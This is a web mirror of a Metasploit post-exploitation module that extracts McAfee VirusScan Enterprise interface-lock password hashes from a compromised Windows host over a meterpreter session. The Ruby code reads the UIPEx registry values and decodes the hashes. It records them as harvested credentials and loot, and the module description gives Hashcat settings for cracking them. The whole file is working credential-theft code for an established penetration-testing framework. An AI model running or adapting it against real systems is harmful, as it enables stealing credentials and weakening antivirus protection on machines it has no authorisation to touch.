Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb
19593 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8
  include Msf::Auxiliary::Report

9
  include Msf::Post::Windows::UserProfiles

10


11
  VERSION_5 = Rex::Version.new('5.0')

12
  VERSION_6 = Rex::Version.new('6.0')

13
  VERSION_8 = Rex::Version.new('8.0')

14
  VERSION_9 = Rex::Version.new('9.0')

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'McAfee Virus Scan Enterprise Password Hashes Dump',

21
        'Description' => %q{

22
          This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)

23
          used to lock down the user interface. Hashcat supports cracking this type of

24
          hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt

25
          (--hex-salt) of 01000f000d003300 (unicode "\x01\x0f\x0d\x33"). A dynamic

26
          format is available for John the Ripper at the referenced URL.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'Mike Manzotti <mike.manzotti[at]dionach.com>', # Metasploit module

31
          'Maurizio inode Agazzini' # original research

32
        ],

33
        'References' => [

34
          ['URL', 'https://www.dionach.com/blog/disabling-mcafee-on-access-scanning']

35
        ],

36
        'Platform' => [ 'win' ],

37
        'SessionTypes' => [ 'meterpreter' ],

38
        'Notes' => {

39
          'Stability' => [CRASH_SAFE],

40
          'SideEffects' => [],

41
          'Reliability' => []

42
        }

43
      )

44
    )

45
  end

46


47
  def run

48
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']

49
    print_status("Looking for McAfee VSE password hashes on #{hostname} (#{session.session_host}) ...")

50


51
    vse_keys = enum_vse_keys

52
    if vse_keys.empty?

53
      vprint_error('McAfee VSE not installed or insufficient permissions')

54
      return

55
    end

56


57
    hashes_and_versions = extract_hashes_and_versions(vse_keys)

58
    if hashes_and_versions.empty?

59
      vprint_error('No McAfee VSE hashes extracted')

60
      return

61
    end

62
    process_hashes_and_versions(hashes_and_versions)

63
  end

64


65
  def enum_vse_keys

66
    vprint_status('Enumerating McAfee VSE installations')

67
    keys = []

68
    [

69
      'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit

70
      'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit

71
    ].each do |key|

72
      subkeys = registry_enumkeys(key)

73
      keys << key unless subkeys.nil?

74
    end

75
    keys

76
  end

77


78
  def extract_hashes_and_versions(keys)

79
    vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")

80
    hash_map = {}

81
    keys.each do |key|

82
      hash = registry_getvaldata(key, 'UIPEx')

83
      if hash.empty?

84
        vprint_error("No McAfee VSE password hash found in #{key}")

85
        next

86
      end

87


88
      version = registry_getvaldata(key, 'szProductVer')

89
      if version.empty?

90
        vprint_error("No McAfee VSE version key found in #{key}")

91
        next

92
      end

93
      hash_map[hash] = Rex::Version.new(version)

94
    end

95
    hash_map

96
  end

97


98
  def process_hashes_and_versions(hashes_and_versions)

99
    hashes_and_versions.each do |hash, version|

100
      if version >= VERSION_5 && version < VERSION_6

101
        hashtype = 'md5u'

102
        version_name = 'v5'

103
      else

104
        # Base64 decode hash

105
        hash = Rex::Text.to_hex(Rex::Text.decode_base64(hash), '')

106
        hashtype = 'dynamic_1405'

107
        version_name = 'v8'

108
        unless version >= VERSION_8 && version < VERSION_9

109
          print_warning("Unknown McAfee VSE version #{version} - Assuming v8")

110
        end

111
      end

112


113
      print_good("McAfee VSE #{version_name} (#{hashtype}) password hash: #{hash}")

114


115
      credential_data = {

116
        post_reference_name: refname,

117
        origin_type: :session,

118
        private_type: :nonreplayable_hash,

119
        private_data: hash,

120
        session_id: session_db_id,

121
        jtr_format: hashtype,

122
        workspace_id: myworkspace_id

123
      }

124


125
      create_credential(credential_data)

126


127
      # Store McAfee password hash as loot

128
      loot_path = store_loot('mcafee.hash', 'text/plain', session, "mcafee:#{hash}", 'mcafee_hashdump.txt', 'McAfee Password Hash')

129
      print_good("McAfee VSE password hash saved in: #{loot_path}")

130
    end

131
  end

132
end

133


134